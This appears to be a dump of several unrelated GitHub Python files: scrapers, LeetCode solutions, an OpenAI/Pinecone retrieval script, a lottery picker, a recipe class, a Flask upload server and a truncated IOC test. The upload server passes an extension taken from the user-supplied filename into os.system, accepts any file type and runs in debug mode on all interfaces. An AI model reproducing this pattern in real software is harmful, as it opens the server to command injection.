+{"seq_id":"23861840277","text":"import re\nimport json\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport settings\nimport hf\n\nclassifiers_response = requests.post(settings.getClassifierUrl())\nclassifier_node = BeautifulSoup(classifiers_response.text, 'html.parser')\n\ndivision_elements = classifier_node.select('#calc_selDiv > option')\ndivisions = [{'id': opt.get('value'), 'name': opt.text}\n for opt in division_elements]\n\nclassifier_elements = classifier_node.select('#calc_selClassifier > option')\nclassifiers = [\n {\n 'id': opt.get('value'),\n 'stage_number': re.split(r'\\s{7}', opt.text)[0],\n 'name': re.split(r'\\s{7}', opt.text)[1]\n } for opt in classifier_elements\n]\n\n# print(divisions[0:1])\n\nfor classifier in classifiers[0:1]:\n classifier['divisions'] = {\n division['name'].lower(): hf.getHitFactors(classifier, division)\n for division in divisions[0:1]\n }\n\noutput = {\n 'classifiers': classifiers,\n 'divisions': divisions\n}\n\n\nprint(json.dumps(output))\n","repo_name":"cameojokes/classifier-scraper","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
+{"seq_id":"40608007569","text":"class Solution:\n def letterCombination(self, digits):\n letterMap = {'2':'abc', '3':'def', '4':'ghi', '5':'jkl', '6':'mno','7':'pqrs','8':'tuv','9':'wxyz'}\n res = []\n if not digits:\n return res\n\n self.dfs(digits, 0, '', res, letterMap)\n return res\n\n def dfs(self, digits, index, tempRes, res, lMap):\n if index > len(digits) - 1:\n res.append(tempRes)\n return\n else:\n letters = lMap[digits[index]]\n for letter in letters:\n self.dfs(digits, index + 1, tempRes + letter, res, lMap)\n\n\n# All combinations are generated by a recursive depth-first (backtracking) walk over the digit-to-letter tree\n","repo_name":"borntoburnyo/AlgorithmInPython","sub_path":"medium/17_letter_combinations_of_a_phone_number.py","file_name":"17_letter_combinations_of_a_phone_number.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
+{"seq_id":"27397576425","text":"# from .config import openaiapi, openaiorg, pinecone_api_key, pinecone_environment\nimport os\nimport openai\nimport pinecone\nimport pickle\nimport re\nimport json\nimport time\nfrom spacy.lang.en import English\n\n\nopenaiapi = os.environ.get(\"OPENAI_API_KEY\")\nopenaiorg = os.environ.get(\"OPENAI_ORG_ID\")\npinecone_api_key = os.environ.get(\"PINECONE_API_KEY\")\npinecone_environment = os.environ.get(\"PINECONE_ENV\")\n\nopenai.api_key = openaiapi\nopenai.organization = openaiorg\n\nnlp = English() # Just the language with no model\nnlp.add_pipe(\"sentencizer\") # Adding a sentencizer pipeline component\n\n\ndef split_sentences(text):\n doc = nlp(text)\n return [sent.text for sent in doc.sents]\n\n\ndef split_into_chunks(text, max_len=800):\n sentences = split_sentences(text)\n 
chunks = []\n current_chunk = \"\"\n for sentence in sentences:\n if len(current_chunk) + len(sentence) <= max_len:\n current_chunk += sentence\n else:\n chunks.append(current_chunk.strip())\n current_chunk = sentence\n\n if current_chunk.strip():\n chunks.append(current_chunk.strip())\n return chunks\n\n\ndef clean_and_split_text(text):\n # Remove extra newline characters and join the text\n text = \" \".join(text.strip().split(\"\\n\"))\n # Remove page numbers\n text = re.sub(r\"\\d+\\n\", \"\", text)\n # Remove citations\n # text = re.sub(r\"(?:\\*\\s*[A-Za-z\\d*]+\\s*vide[^“]*?(?:\\n|$))\", \"\", text)\n # Identify rule titles and add a separator before them\n text = re.sub(r\"(\\d+(\\.|\\')\\.?\\s[^—]+[,—])\", r\"@@@\\1\", text)\n # Split the text based on the separator\n segments = text.split(\"@@@\")\n # Create a list to store the cleaned segments\n cleaned_segments = []\n for segment in segments:\n # Only remove extra spaces and newline characters\n segment = re.sub(r\"\\s+\", \" \", segment).strip()\n\n if len(segment) > 800:\n split_chunks = split_into_chunks(segment)\n cleaned_segments.extend(split_chunks)\n else:\n cleaned_segments.append(segment)\n cleaned_segments = [segment for segment in cleaned_segments if segment.strip()]\n return cleaned_segments\n\n\ndef write_chunks_to_file(chunks, pdf_path, namespace=None):\n # Create a 'chunks' directory if it doesn't exist\n if not os.path.exists(\"chunks\"):\n os.makedirs(\"chunks\")\n # Set the output file name using the original PDF filename\n if pdf_path:\n output_filename = os.path.splitext(os.path.basename(pdf_path))[0]\n else:\n output_filename = namespace\n output_file_path = f\"./chunks/{output_filename}_chunks.txt\"\n # Write the chunks to the output file\n with open(output_file_path, \"w\") as f:\n for idx, chunk in enumerate(chunks, start=1):\n f.write(f\"Chunk {idx}:\\n\")\n f.write(chunk)\n f.write(\"\\n\\n\")\n\n\ndef process_extracted_text(\n query,\n text,\n pdf_path,\n search_scope=\"current_file\",\n namespace=None,\n department=None,\n type_of_document=None,\n year=None,\n):\n # selecting the huggingface tokeniser and selecting the chunk sizes\n\n texts = []\n # max_length = 4000\n # overlap = 100\n\n # splitting the text into chunks using our custom function\n texts = clean_and_split_text(text)\n write_chunks_to_file(texts, pdf_path, namespace)\n\n # initialising the openai api key\n model_engine = \"text-embedding-ada-002\"\n\n # initialising pinecone\n pinecone.init(\n api_key=pinecone_api_key,\n environment=pinecone_environment,\n )\n\n # fetching the name of the created index and initialising it\n index_name = \"rajgov\"\n index = pinecone.Index(index_name)\n\n # creating embeddings of chunks and uploading them into the index\n # Get embeddings for the PDF file\n if pdf_path:\n file_name = os.path.splitext(os.path.basename(pdf_path))[0]\n else:\n file_name = namespace\n embeddings_file_path = f\"./embeddings/{file_name}_embeddings.pkl\"\n\n if namespace is None:\n namespace = file_name\n\n embeddings = []\n if not os.path.exists(embeddings_file_path):\n # creating embeddings of chunks and save them to a file\n for i, chunk in enumerate(texts):\n response = openai.Embedding.create(input=[chunk], model=model_engine)\n embedding = response[\"data\"][0][\"embedding\"]\n metadata = {\"text\": chunk}\n if department is not None:\n metadata[\"department\"] = department\n if type_of_document is not None:\n metadata[\"type_of_document\"] = type_of_document\n if year is not None:\n metadata[\"year\"] = year\n 
embeddings.append((f\"chunk_{i}\", embedding, metadata))\n\n with open(embeddings_file_path, \"ab\") as f:\n print(f\"Saving embeddings of chunk_{i} to {embeddings_file_path}\")\n pickle.dump([(f\"chunk_{i}\", embedding, metadata)], f)\n\n # Upserting embeddings to namespace\n index.upsert(\n vectors=[(f\"chunk_{i}\", embedding, metadata)], namespace=namespace\n )\n else:\n # load embeddings from the file\n with open(embeddings_file_path, \"rb\") as f:\n print(f\"Loading embeddings from {embeddings_file_path}\")\n while True:\n try:\n embeddings.append(pickle.load(f))\n except EOFError:\n break\n\n completed_chunks = len(embeddings)\n print(f\"Completed chunks: {completed_chunks}\")\n\n # Continue creating embeddings from where it left off\n for i, chunk in enumerate(texts[completed_chunks:], start=completed_chunks):\n response = openai.Embedding.create(input=[chunk], model=model_engine)\n embedding = response[\"data\"][0][\"embedding\"]\n metadata = {\"text\": chunk}\n if department is not None:\n metadata[\"department\"] = department\n if type_of_document is not None:\n metadata[\"type_of_document\"] = type_of_document\n if year is not None:\n metadata[\"year\"] = year\n embeddings.append((f\"chunk_{i}\", embedding, metadata))\n\n with open(embeddings_file_path, \"ab\") as f:\n print(f\"Saving embeddings of chunk_{i} to {embeddings_file_path}\")\n pickle.dump([(f\"chunk_{i}\", embedding, metadata)], f)\n\n # Upserting embeddings to namespace\n index.upsert(\n vectors=[(f\"chunk_{i}\", embedding, metadata)], namespace=namespace\n )\n\n # preparing the query\n \"\"\"query = translate_to_english_chatgpt(query)\n focus_phrases = extract_focus_phrases(query)\n print(f\"QUERY: {query}\")\"\"\"\n\n # querying the index\n query_response = openai.Embedding.create(input=[query], model=model_engine)\n query_embedding = query_response[\"data\"][0][\"embedding\"]\n\n # the response will be in json with id, metadata with text, and score\n if search_scope == \"current_file\":\n results = index.query(\n queries=[query_embedding],\n top_k=5,\n include_metadata=True,\n namespace=namespace,\n )\n else: # search_scope == 'entire_database'\n results = index.query(queries=[query_embedding], top_k=5, include_metadata=True)\n print(results)\n\n answer, search_results = chatgpt_summarize_results(\n query, results\n ) # focus_phrases,)\n\n print(f\"ANSWER: {answer}\")\n\n return answer, search_results\n\n\ndef chatgpt_summarize_results(query, results): # focus_phrases)\n search_results = \"\"\n for match in results[\"results\"][0][\"matches\"]:\n score = match[\"score\"]\n text = match[\"metadata\"][\"text\"]\n search_results += f\"{score:.2f}: {text}\\n\"\n print(search_results)\n\n response = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=[\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant working at a government help center facilities. People ask you questions related to permissable activities,and for information on government services.\",\n },\n {\n \"role\": \"user\",\n \"content\": f\"The query is: '{query}'. Based on the following search results, provide an answer to the query, after considering each result with respect to the query and checking if anything related to the query can be inferred from each result. Finally, comment on reason for your final interpreation, as well as any additional information that may not be contained in the text that may help answer the query. 
\n\ndef chatgpt_summarize_results(query, results):\n search_results = \"\"\n for match in results[\"results\"][0][\"matches\"]:\n score = match[\"score\"]\n text = match[\"metadata\"][\"text\"]\n search_results += f\"{score:.2f}: {text}\\n\"\n print(search_results)\n\n response = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=[\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant working at a government help center facility. People ask you questions related to permissible activities, and for information on government services.\",\n },\n {\n \"role\": \"user\",\n \"content\": f\"The query is: '{query}'. Based on the following search results, provide an answer to the query, after considering each result with respect to the query and checking if anything related to the query can be inferred from each result. Consider not only exact matches but also possible inferences about the expected action that can be made based on the results. Finally, comment on the reason for your final interpretation, as well as any additional information that may not be contained in the text that may help answer the query:\\n\\n{search_results}\", # the focus phrases extracted above (currently disabled) could also be passed here for better inference\n },\n ],\n )\n\n gpt_response = response.choices[0].message[\"content\"].strip()\n\n return gpt_response, search_results\n\n\ndef chatgpt_get_response(context, query):\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant working at a government help center facility. People ask you questions related to permissible activities, and for information on government services.\",\n },\n {\"role\": \"user\", \"content\": context},\n {\"role\": \"user\", \"content\": query},\n ],\n )\n\n return response.choices[0].message[\"content\"].strip()\n\n\n# just as an aside, the following prompts gave 2 different results when run twice, without making any change to\n# prompt or query. One said permission can be given, the other said permission cannot be given.\n# here are the prompts\n\"\"\" for all 3 : role : system : You are a helpful assistant working at a government help center facility. People ask you questions related to permissible activities, and for information on government services\nfor 1 : role : user : Translate the following text to English: Then give answers on what is the context of the text and what is the action expected. Finally, convert the text into an appropriate query that can be used to search through a semantic database to search through embedded text to find the right text that can give an answer on whether the action expected can be performed within the given context. Make sure that the query is appropriate for searching through a semantic database consisting of government laws and regulations, and avoid adding those phrases to the query that may unnecessarily confuse the search engine.'\nfor 2 : role : user : Extract key phrases from the following query: Only extract the phrases related to actions that are expected (including giving permissions under existing regulations, asking for details regulations relevant to the case etc), that can be searched through a database of government acts and regulations. Avoid extracting phrases that are not relevant to the semantic search through a database of government rules.\nfor 3 : role : user : The query is: Based on the following search results, provide an answer to the query, after considering each result with respect to the query and checking if anything related to the query can be inferred from each result. Finally, comment on the reason for your final interpretation, as well as any additional information that may not be contained in the text that may help answer the query. considering not only exact matches but also possible inferences about the expected action that can be made based on the results. 
You may also use the focus phrases : for better inference.:\"\"\"\n\n\n\"\"\"def split_text(text, max_chunk_size=300, overlap=50):\n pattern = r'(\\d+(\\.\\d+)*\\s*\\w*\\.?)'\n chunks = re.split(pattern, text)\n\n combined_chunks = []\n for i in range(0, len(chunks)-1, 2):\n chunk = ''\n if chunks[i]:\n chunk += chunks[i]\n if chunks[i+1]:\n chunk += chunks[i+1]\n combined_chunks.append(chunk)\n\n cleaned_chunks = [chunk.replace('\\n', ' ').strip()\n for chunk in combined_chunks]\n\n smaller_chunks = []\n for chunk in cleaned_chunks:\n rule_number_match = re.match(r'(\\d+(\\.\\d+)*)', chunk)\n if rule_number_match:\n rule_number = rule_number_match.group(1)\n chunk = re.sub(r'\\d+(\\.\\d+)*', '', chunk).strip()\n else:\n rule_number = ''\n\n tokens = chunk.split()\n\n for i in range(0, len(tokens), max_chunk_size - overlap):\n start = max(0, i - overlap) if i > 0 else i\n end = min(i + max_chunk_size, len(tokens))\n small_chunk = ' '.join(tokens[start:end])\n if rule_number:\n if start > 0:\n small_chunk = f\"{rule_number} (cont'd) \" + small_chunk\n else:\n small_chunk = f\"{rule_number} \" + small_chunk\n smaller_chunks.append(small_chunk)\n total_chunks = len(smaller_chunks)\n print(f\"Total number of chunks created: {total_chunks}\")\n return smaller_chunks\n\n\nPrevious answer :\nwith press or radio—Previous sanction of the Government shall not be required when the member of the service, in the bonafide discharge of his duties or otherwise, publishes a book or contributes to or participates in a public media. Provided that he shall observe the provisions of rules and at all times make it clear that the views expressed, are of his own and not those of the Government. 7. Criticism\n0.84: should not be given to a moS to publish articles in the journals, souvenirs etc., of political parties: - A doubt has been raised whether members of the All India Services can be permitted to publish articles in the journals, souvenirs etc., of political parties. 2. The\n0.81: 1995) 185 Provided that nothing in this rule shall apply to any statement made or views expressed by a member of the Service in his official capacity and in the due performance of the duties assigned to him. (GOI Instructions: D.P. & A.R. letter No. 11017/9/75—AlS(III), dated the 2nd March, 1976, reproduced under Miscellaneous Executive Instructions at the end of these Rules) 8. Evidence\n0.81: Government may, however, at any time disallow the officer from pursuing his application for admission of financial assistance in cases where Govt. is of the view that 207 a member of the service has utilized his official influence to obtain the same or if the Government feels that such course of action is not in the interest of the Government. [Letter No. 
11017/18/91-AIS(III)dated 1.7.\n0.81: from literary, cultural or artistic efforts, which are not aided by the knowledge acquired by the member in the course of his service, is not ‘fee’ for the purpose of SR 12 and can be retained by the officer in full: - A question arose, whether a member of the service could accept royalty of the publication of a book of literary, artistic, or scientific character and also whether such royalties were to be treated as ‘Fee’ u\nPrevious query: \nCan an officer publish an article in a journal?\nPrevious final answer: \nBased on the search results, it can be inferred that a member of the service is allowed to publish a book or contribute to a public media in the bonafide discharge of his duties or otherwise, without requiring the previous sanction of the government. However, it is mandatory for the member to observe the provisions of rules and ensure that the views expressed are his own and not those of the government. It is not clear whether the query refers to a civil or police officer, but it does not seem to be prohibited unless it is a publication in a journal of a political party. It is important to note that any statements made or views expressed in the due performance of the duties assigned to him by a member of the service in his official capacity exempt him from the rule.\"\"\"\n\n\n\"\"\"def translate_to_english_chatgpt(text):\n    response = openai.ChatCompletion.create(\n        model=\"gpt-3.5-turbo\",\n        messages=[\n            {\"role\": \"system\", \"content\": \"You are a helpful assistant working at a government help center. People ask you questions related to permissible activities, and for information on government services.\"},\n            {\"role\": \"user\", \"content\": f\"Translate the following text to English: '{text}'. Then give answers on what is the context of the text and what is the action expected. Finally, convert the text into an appropriate query that can be used to search through a semantic database to search through embedded text to find the right text that can give an answer on whether the action expected can be performed within the given context. Make sure that the query is appropriate for searching through a semantic database consisting of government regulations, policies, programmes and other government services, and avoid adding those phrases to the query that may unnecessarily confuse the search engine.\"}\n        ]\n    )\n    translated_text = response.choices[0].message['content'].strip()\n    print(f\"Translated text : '{translated_text}\")\n    return translated_text\n\n\ndef extract_focus_phrases(translated_text):\n\n    response = openai.ChatCompletion.create(\n        model=\"gpt-3.5-turbo\",\n        messages=[\n            {\"role\": \"system\", \"content\": \"You are a helpful assistant working at a government help center. People ask you questions related to permissible activities, and for information on government services.\"},\n            {\"role\": \"user\",\n             \"content\": f\"Extract key phrases from the following query: '{translated_text}'. Only extract the phrases related to actions that are expected (including giving permissions under existing regulations, asking for details within government schemes, looking for legal advice etc), that can be searched through a database of government acts, regulations, policies and welfare schemes. 
Avoid extracting phrases that are not relevant to the semantic search through such a database.\"}\n ]\n )\n focus_phrases = response.choices[0].message['content'].strip()\n print(focus_phrases)\n print(f\"Focus phrases : '{focus_phrases}\")\n return focus_phrases\"\"\"\n","repo_name":"Samoppakiks/govGPT","sub_path":"src/embedchat.py","file_name":"embedchat.py","file_ext":"py","file_size_in_byte":18265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"19103467004","text":"class Solution:\n    def buddyStrings(self, s: str, goal: str) -> bool:\n        swapped_chars = False\n        swap_at = None\n        can_swap = False\n        chars_seen = set()\n        \n        if len(s) != len(goal):\n            return False\n        \n        for i in range(len(s)):\n            if s[i] in chars_seen:\n                can_swap = True\n            else:\n                chars_seen.add(s[i])\n            \n            if s[i] == goal[i]:\n                continue\n            \n            if swapped_chars:\n                return False\n            \n            if swap_at is None:\n                swap_at = i\n            else:\n                if s[swap_at] != goal[i] or s[i] != goal[swap_at]:\n                    return False\n                swapped_chars = True\n                swap_at = None\n        \n        if swap_at is not None:\n            return False\n        \n        return swapped_chars or can_swap\n\n\"\"\"\nCould try swapping all combinations of 2 letters and testing equality: O(n^2) time\nFrequency mapping is not enough because order matters\nIterate over both strings. Store something as soon as I find one char that doesn't match. If I find another char that doesn't match, return false if they can't be swapped. And even if they can, return false if I find another non-match later on\n\nabcd\ndbca\n\"\"\"","repo_name":"NishantTharani/LeetcodeSolutions","sub_path":"0859-buddy-strings/0859-buddy-strings.py","file_name":"0859-buddy-strings.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"17050719933","text":"import random\r\nimport os\r\n\r\ncont = 0\r\n\r\nddz = []\r\nmega_sena = []\r\nlotofacil = []\r\n\r\nprint(\"Welcome to the World of Lotteries !!!!!\")\r\nprint()\r\nprint(\"Enter your desired option.\")\r\nprint()\r\n\r\nopcao = input(\"Enter 1 for Jogo do Bicho: \\nEnter 2 for Lotteries: \")\r\nprint()\r\n\r\nif opcao == \"1\":\r\n    print(\"****** Enter your game ******\")\r\n    jogo = input(\"Enter 1 for Centena: \\nEnter 2 for Milhar: \\nEnter 3 for DDZ: \")\r\n    print(\"--------------\")\r\n    print()\r\n    if jogo == \"1\":\r\n        centena = random.randint(000,100)\r\n        print(\"The drawn Centena was: \",centena)\r\n\r\n    elif jogo == \"2\":\r\n        milhar = random.randint(0000,9999)\r\n        print(\"The drawn Milhar was: \",milhar)\r\n\r\n    elif jogo == \"3\":\r\n        while cont != 2:\r\n            sorteado = random.randint(00,99)\r\n            if sorteado not in ddz:\r\n                ddz.append(sorteado)\r\n                cont += 1\r\n        print(\"DDZ: \",ddz)\r\n\r\n    '''End of the Jogo do Bicho block'''\r\nelif opcao == \"2\":\r\n    print(\"Enter your game\")\r\n\r\n\r\n    jogo = input(\"Enter 1 for Mega-Sena\\nEnter 2 for Lotofácil\")\r\n    if jogo == \"1\":\r\n\r\n        while cont != 6:\r\n            sorteado = random.randint(1,60)\r\n            if sorteado not in mega_sena:\r\n                mega_sena.append(sorteado)\r\n                cont += 1\r\n            elif sorteado in mega_sena:\r\n                sorteado = random.randint(1,60)\r\n\r\n        mega_sena.sort()\r\n        print(\"MEGA-SENA\",mega_sena)\r\n\r\n    elif jogo == \"2\":\r\n        while cont != 15:\r\n            sorteado = random.randint(1,25)\r\n            if sorteado not in lotofacil:\r\n                lotofacil.append(sorteado)\r\n                cont += 1\r\n            elif sorteado in lotofacil:\r\n                sorteado = random.randint(1,25)\r\n\r\n        lotofacil.sort()\r\n        
print(\"LOTOFÁCIL\",lotofacil)\r\n\r\n\r\n\r\nos.system(\"pause\")","repo_name":"wilian-tavares/Programas-Python","sub_path":"sorteio.py","file_name":"sorteio.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"25210662768","text":"\"\"\"Ad-hoc script for extracting preprocessed tweet text from datasets.\n\nPlease execute ../tweet_preprocessor.py to dataset files and obtain dataset_*_tok.csv in advance.\nThis script should be executed at under stance/data as default.\n\"\"\"\nimport logging\nimport os\nimport pandas as pd\nfrom fire import Fire\n\nlogger = logging.getLogger(__name__)\n\n\ndef extract_preprocessed(root_path='.',\n dataset_path='datasets',\n dataset_filename='dataset_tok.csv',\n output_path='preprocessed_tweets/slo',\n encoding='utf-8',\n logging_level=logging.INFO):\n \"\"\"This function extracts the raw text from the given tokenized dataset\n file. The text includes both the tweet text and the user profile\n description text. The input is assumed to have been tokenized by\n tweet_preprocessor.py. The output is written to path/filename.txt.\n\n Keyword Arguments\n :param root_path: the root system path to the target/destination files\n (default: .)\n :param dataset_path: the name of the dataset sub-directory\n (default: datasets)\n :param dataset_filename: the name of the dataset file\n (default: dataset_tok.csv)\n :param output_path: the sub-directory into which to put the results\n (default: preprocessed_tweets)\n :param encoding: the file encoding\n (default: utf-8)\n logging_level -- the level of logging to use\n (default: logging.INFO)\n \"\"\"\n logging.basicConfig(level=logging_level, format='%(message)s')\n\n dataset_filepath = f'{root_path}/{dataset_path}/{dataset_filename}'\n if not os.path.isfile(dataset_filepath):\n logger.fatal(f'\\tdataset file doesn\\'t exist: {dataset_filepath}')\n exit(-1)\n if not dataset_filename.endswith('_tok.csv'):\n logger.fatal(f'\\tdataset isn\\'t properly tokenized: {dataset_filepath}')\n exit(-1)\n\n logger.info(f'loading {dataset_filepath}...')\n df = pd.read_csv(dataset_filepath)\n output_filename = dataset_filename.split('.')[0]\n output_filepath = f'{root_path}/{output_path}/{output_filename}.txt'\n users = set()\n with open(output_filepath, 'w', encoding=encoding) as fout:\n logger.info(f'writing to {output_filepath}...')\n # Dump unique tweet and profile texts (separately).\n fout.writelines([text for text in df['tweet_t'].unique() + '\\n'])\n fout.writelines([text for text in df['profile_t'].unique() + '\\n'])\n # Older code for SemEval testing...\n # elif dataset_path == 'SemEval2016taskA':\n # # join testsplit and trainsplit\n # outp = f'preprocessed_tweets/semeval/{name}.txt'\n # with open(outp, 'a') as f:\n # f.writelines([tweet + '\\n' for tweet in df['tweet_t']])\n # print('\\t->', outp, 'with appending')\n\n\nif __name__ == '__main__':\n Fire(extract_preprocessed)\n # Example invocation:\n # python extract_preprocessed.py --path=/media/hdd_2/slo/stance --dataset_filename=dataset_20100101-20180510_tok.csv\n","repo_name":"Calvin-CS/slo-classifiers","sub_path":"stance/data/extract_preprocessed.py","file_name":"extract_preprocessed.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"12077969787","text":"\nclass Recipe:\n def __new__(cls, *args, **kwargs):\n return super().__new__(cls)\n\n # Need to hanlde type 
checking\n def __init__(self, name, lvl, time, ingredients, description, type):\n self.name = name\n self.cooking_lvl = lvl\n self.cooking_time = time\n self.ingredients = ingredients\n self.description = description\n self.recipe_type = type\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, name):\n if isinstance(name, str):\n if name:\n self._name = name\n else:\n raise ValueError('\"name\" cannot be empty')\n else:\n raise TypeError('\"name\" must be a string')\n\n @property\n def cooking_lvl(self):\n return self._cooking_lvl\n\n @cooking_lvl.setter\n def cooking_lvl(self, cooking_lvl):\n if isinstance(cooking_lvl, int):\n if cooking_lvl >= 1 and cooking_lvl <= 5:\n self._cooking_lvl = cooking_lvl\n else:\n raise ValueError('\"cooking_lvl\" should be between 1 and 5')\n else:\n raise TypeError('\"cooking_lvl\" must be an int')\n\n @property\n def cooking_time(self):\n return self._cooking_time\n\n @cooking_time.setter\n def cooking_time(self, cooking_time):\n if isinstance(cooking_time, int):\n if cooking_time > 0:\n self._cooking_time = cooking_time\n else:\n raise ValueError('\"cooking_time\" should be positive')\n else:\n raise TypeError('\"cooking_time\" must be an int')\n\n @property\n def ingredients(self):\n return self._ingredients\n\n @ingredients.setter\n def ingredients(self, ingredients):\n if isinstance(ingredients, list):\n if not ingredients:\n raise ValueError('\"ingredients\" cannot be empty')\n if not all(i for i in ingredients):\n raise ValueError('\"ingredients\" cannot contain empty values')\n if not all(isinstance(i, str) for i in ingredients):\n raise TypeError('\"ingredients\" should contain strings')\n self._ingredients = ingredients\n else:\n raise TypeError('\"ingredients\" must be a list')\n\n @property\n def description(self):\n return self._description\n\n @description.setter\n def description(self, description):\n if isinstance(description, str):\n self._description = description\n else:\n raise TypeError('\"description\" must be a string')\n\n @property\n def recipe_type(self):\n return self._recipe_type\n\n @recipe_type.setter\n def recipe_type(self, recipe_type):\n if isinstance(recipe_type, str):\n if not recipe_type:\n raise ValueError('\"recipe_type\" cannot be empty')\n if recipe_type in [\"starter\", \"lunch\", \"dessert\"]:\n self._recipe_type = recipe_type\n else:\n raise ValueError(\n '\"type\" must be in [\"starter\", \"lunch\", \"dessert\"]')\n else:\n raise TypeError('\"recipe_type\" must be a string')\n\n def __str__(self):\n \"\"\"Return the string to print with the recipe info\"\"\"\n txt = f\"{self.name} is a level {self.cooking_lvl} recipe.\\n\"\n txt += f\"You will need {self.cooking_time} mins \"\n txt += f\"and these ingredients {self.ingredients} to complete it.\\n\"\n txt += f\"This dish is usually served as {self.recipe_type}.\\n\"\n if self.description:\n txt += f\"Additional details:\\n{self.description}\\n\"\n return txt\n","repo_name":"cnstll/PythonBasics","sub_path":"Module_01/ex00/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43083149273","text":"# encoding=utf8\nfrom __future__ import with_statement\nimport json\nimport time\nimport traceback\nimport os\nfrom flask import Flask\nfrom flask import Flask, session, jsonify, send_from_directory\nfrom flask_restful import request\nfrom flask_restful import Resource, Api, abort\nfrom flask_restful import 
reqparse\n\napp = Flask(__name__)\napi = Api(app)\napp.config.update(RESTFUL_JSON=dict(ensure_ascii=False))\n\n\n\nupload_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"upload\")\nif os.path.exists(upload_path):\n    print('upload dir exists')\nelse:\n    os.mkdir(upload_path)\n    print('mkdir upload dir success')\n\nparser = reqparse.RequestParser()\n\n@app.route('/')\ndef index():\n    return send_from_directory(os.path.dirname(os.path.abspath(__file__)),'upload.html')\n\ndef unzip_deploy(filename):\n    os.system('unzip upload/' + filename)\n    os.system('mv Edbox_JSLibs libs')\n    unix_time = str(int(time.time()) * 100)\n    os.system('mv 235/libs 235/xxxx && mv 234/libs 234/xxxx && mv 233/libs 233/xxxx '.replace('xxxx',unix_time))\n    os.system('cp -R libs 235/ && cp -R libs 234/ && mv libs 233/')\n\n\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n    # if request.method == 'POST':\n    if request.method == 'POST':\n        f = request.files['file']  # get the uploaded file from the form's \"file\" field (\"file\" is the form field's name attribute)\n        fname = f.filename\n        if f:  # check whether this is an allowed upload file type\n            print(fname)\n            ext = fname.rsplit('.', 1)[1]  # get the file extension\n            unix_time = str(int(time.time())*100)\n            new_filename = 'upload_' + unix_time + '.' + ext  # rename the uploaded file\n            f.save(os.path.join(upload_path, new_filename))  # save the file to the upload directory\n            try:\n                unzip_deploy(new_filename)\n            except:\n                traceback.print_exc()\n                return \"deploy file error\"\n            result = {'oldfile': fname,'newfile': new_filename, 'success': 1}\n            return json.dumps(result)\n        else:\n            result = {'file': fname, 'success': 0,'reason':'file type illegal'}\n            return json.dumps(result)\n\n\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=9999, debug=True)","repo_name":"tomgiggs/helloPython","sub_path":"webservers/upload_server.py","file_name":"upload_server.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"7652909108","text":"\"\"\"\nQUESTION 1:\nSwap the case of the string that comes as an input and return the string while making sure that the first letter of the string stays Uppercase.\nExample -\n\nInput - \"PyThON\"\n\nOutput - \"PYtHon\"\n\"\"\"\ndef main(i):\n    result = \"\"\n    for ch in range(len(i)):\n        if ch == 0:\n            result += i[ch].upper()\n        elif i[ch].islower():\n            result += i[ch].upper()\n        else:\n            result += i[ch].lower()\n    return result","repo_name":"mohit266/Python-course-Edugrad","sub_path":"Edugrad_1.py","file_name":"Edugrad_1.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"17003271093","text":"import unittest\nfrom time import sleep\n\nfrom parameterized import parameterized\n\nfrom utils.channel_access import ChannelAccess\nfrom utils.ioc_launcher import get_default_ioc_dir\nfrom utils.test_modes import TestModes\nfrom utils.testing import get_running_lewis_and_ioc, skip_if_recsim, unstable_test\n\nDEVICE_PREFIX = \"JSCO4180_01\"\nDEVICE_NAME = \"jsco4180\"\n\nIOCS = [\n    {\n        \"name\": DEVICE_PREFIX,\n        \"directory\": get_default_ioc_dir(\"JSCO4180\"),\n        \"macros\": {},\n        \"emulator\": DEVICE_NAME,\n    },\n]\n\nTEST_MODES = [TestModes.DEVSIM]\n\nERROR_STATE_HARDWARE_FAULT = 4\nERROR_STATE_NO_ERROR = 2\n\nrequired_pvs = [\"COMP:A:SP\", \"COMP:B:SP\", \"COMP:C:SP\", \"START:SP\", \"STATUS\", \"FLOWRATE:SP\", \"TIME:RUN:SP\",\n                \"PRESSURE:MIN:SP\", \"PRESSURE:MAX:SP\", \"ERROR:SP\", \"ERROR:STR\", \"PUMP_FOR_TIME:SP\"]\n\n\nclass Jsco4180Tests(unittest.TestCase):\n    \"\"\"\n    Tests for the Jsco4180 IOC.\n    
